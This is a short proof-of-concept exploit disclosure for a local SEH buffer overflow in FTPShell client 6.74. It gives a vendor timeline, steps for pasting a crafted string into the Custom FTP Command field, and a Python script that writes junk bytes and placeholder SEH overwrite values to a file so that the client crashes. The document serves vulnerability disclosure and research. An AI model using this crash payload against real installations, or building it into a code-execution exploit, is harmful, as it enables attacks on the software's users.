Share
#!/usr/bin/python  
  
  
# Exploit Type : DOS  
# Exploit Title: FTPShell client 6.74 - Local Buffer Overflow (SEH)  
# Vulnerable Software & version : FTPShell client 6.74  
# Vendor Homepage: https://www.ftpshell.com/  
# Software Link: https://www.ftpshell.com/downloadclient.htm  
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7  
Professional SP1(32-bit)  
# Exploit Author: Debashis Pal  
# Timeline  
# Vulnerability Discover Date: 03-Sep-2019  
# Vulnerability Report to Vendor:03-Sep-2019,No responds  
# Again email to Vendor:05-Sep-2019 ,No responds  
# Public Disclose : 09-Sep-2019  
  
  
# PoC  
# 1. FTPShellclient6-74POC.txt from POC.py code, open in  
notepad(FTPShellclient6-74POC.txt), copy contents  
# 2. Open Core FTPShell client 6.74 & connect to a FTP server  
(FTPShell client 6.74 i.e. FTP session need to active along with  
username & password)  
# 3. From FTPShell client 6.74 menu bar select the Tools-> Custom FTP Command  
# 4. paste contents from notepad (into "Custom FTP Command" input field)  
# 5. Application will crash and SEH overwritten  
  
  
  
crash = "\x41" * 396 #Junk  
crash += "\x43" * 4 #nSEH  
crash += "\x42" * 4 #SEH  
crash += "\x44" * 96 #More Junk  
  
  
file="FTPShellclient6-74POC.txt"  
generate=open(file, "w")  
generate.write(crash)  
generate.close  
  
  
Attachment# Application crash and SEH overwritten.jpg  
  
  
Thanks.